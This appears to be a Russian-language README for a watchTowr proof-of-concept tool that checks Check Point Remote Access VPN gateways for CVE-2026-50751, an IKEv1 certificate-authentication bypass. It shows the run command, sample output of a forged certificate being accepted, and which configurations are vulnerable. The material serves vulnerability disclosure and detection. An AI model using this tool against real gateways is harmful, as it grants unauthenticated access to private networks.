
Детектор артефактов для обхода сертификатной аутентификации Check Point VPN IKEv1 (CVE-2026-50751). Проверяет доступность шлюза и демонстрирует неаутентифицированный удалённый доступ с помощью подделанных сертификатов.
Генератор детектирующих артефактов для обхода сертификатной аутентификации IKEv1 в Check Point Remote Access VPN.
https://github.com/user-attachments/assets/1280c545-364e-42d1-94ac-5b2cd850d14e
Технические подробности см. в нашем посте в блоге.
$ python3 watchTowr-vs-Check-Point-CVE-2026-50751.py -rh vpn.example.com -u watchtowr
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Check-Point-CVE-2026-50751.py
(*) Check Point IKEv1 Remote-Access VPN certificate-auth bypass Detection Artifact Generator
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-50751]
[#] CVE-2026-50751 Check Point IKEv1 Remote-Access certificate-auth bypass
[+] Self-signed cert (untrusted); signature will be invalid (no private key)
[#] Connecting via udp ...
[#] Authenticating as 'watchtowr' with the forged certificate + invalid signature...
[#] Decrypting...
[+] Gateway Internal IP: 172.31.255.128
[+] [BYPASSED] Gateway authenticated us as 'watchtowr'. CVE-2026-50751 certificate-authentication bypass confirmed.
Требуется Python 3 и пакет cryptography:
pip install cryptography
Этот генератор детектирующих артефактов watchTowr проверяет и демонстрирует обход аутентификации в Check Point Remote Access VPN / Mobile Access CVE-2026-50751 (CVSS 9.3, CWE-287). Удалённый неаутентифицированный злоумышленник может завершить устаревший обмен IKEv1 phase-1 и быть аутентифицированным как подготовленный пользователь Remote Access без действительного сертификата, закрытого ключа или пароля. Это работает как через IKE (UDP 500/4500), так и через Check Point Visitor Mode / SSL (raw TCP 443, TCPT).
Шлюз уязвим, если он настроен на устаревший путь IKEv1: разрешены устаревшие Remote Access клиенты, разрешён IKEv1
(не только IKEv2-only). Обход сертификатной аутентификации применим к методам аутентификации пользователей
Certificate, Certificate with enrollment и Mixed; обычный Legacy (имя пользователя/пароль) обойти нельзя.
Информацию об устранении уязвимости и дополнительные подробности можно найти в рекомендациях Check Point и хотфиксе sk185033:
Актуальные исследования в области безопасности публикует команда watchTowr Labs.